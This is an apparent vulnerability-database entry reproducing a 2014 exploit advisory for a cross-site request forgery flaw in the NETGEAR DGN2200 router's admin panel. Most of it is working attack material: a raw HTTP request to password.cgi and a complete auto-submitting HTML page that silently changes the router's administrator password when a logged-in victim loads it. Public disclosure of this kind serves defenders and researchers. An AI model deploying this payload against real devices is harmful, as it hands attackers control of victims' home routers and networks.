ID

VAR-E-201405-0358

TITLE

NETGEAR DGN2200 1.0.0.29_1.7.29_HotS - CSRF Vulnerability

AFFECTED PRODUCTS

EXPLOIT

# Exploit Title: CSRF in NETGEAR DGN2200 Admin panel
# Date 02/05/2014
# Exploit author: Dolev Farhi @f1nhack
# Vendor homepage: http://netgear.com
# Affected Firmware version: 1.0.0.29_1.7.29_HotS
# Affected Hardware: NETGEAR DGN2200 Wireless ADSL Router
Summary
=======
A CSRF Attack was discovered in the Admin panel of NETGEAR DGN2200 Router.
Vulnerability Description
=========================
Cross Site Request Forgery attack (CSRF)
PoC
====
POST /password.cgi HTTP/1.1
Host: 10.0.0.138
Proxy-Connection: keep-alive
Content-Length: 122
Cache-Control: max-age=0
Authorization: Basic QWRtaW46VG9vbGJveDEj
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Origin: http://10.0.0.138
User-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.116 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Referer: http://10.0.0.138/PWD_password.htm
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
sysOldPasswd=OLDPASS&sysNewPasswd=NEWPASS&sysConfirmPasswd=NEWPASS&authTimeout=5&cfAlert_Apply=Apply
Exploit
=========
<html>
<body onload="javascript:document.forms[0].submit()">
<H2>CSRF Exploit to change Admin password</H2>
<form method="POST" name="form0" action="http://10.0.0.138/password.cgi">
<input type="hidden" name="sysOldPasswd" value="OLDPASS"/>
<input type="hidden" name="sysNewPasswd" value="NEWPASS"/>
<input type="hidden" name="sysConfirmPasswd" value="NEWPASS"/>
<input type="hidden" name="authTImeout" value="5"/>
<input type="hidden" name="cfAlert_Apply" value="Apply"/>
</form>
</body>
</html>

PRICE

free

TYPE

CSRF Vulnerability

EXTERNAL IDS

REFERENCES

SOURCES

LAST UPDATE DATE

2022-07-27T10:00:58.790000+00:00

SOURCES RELEASE DATE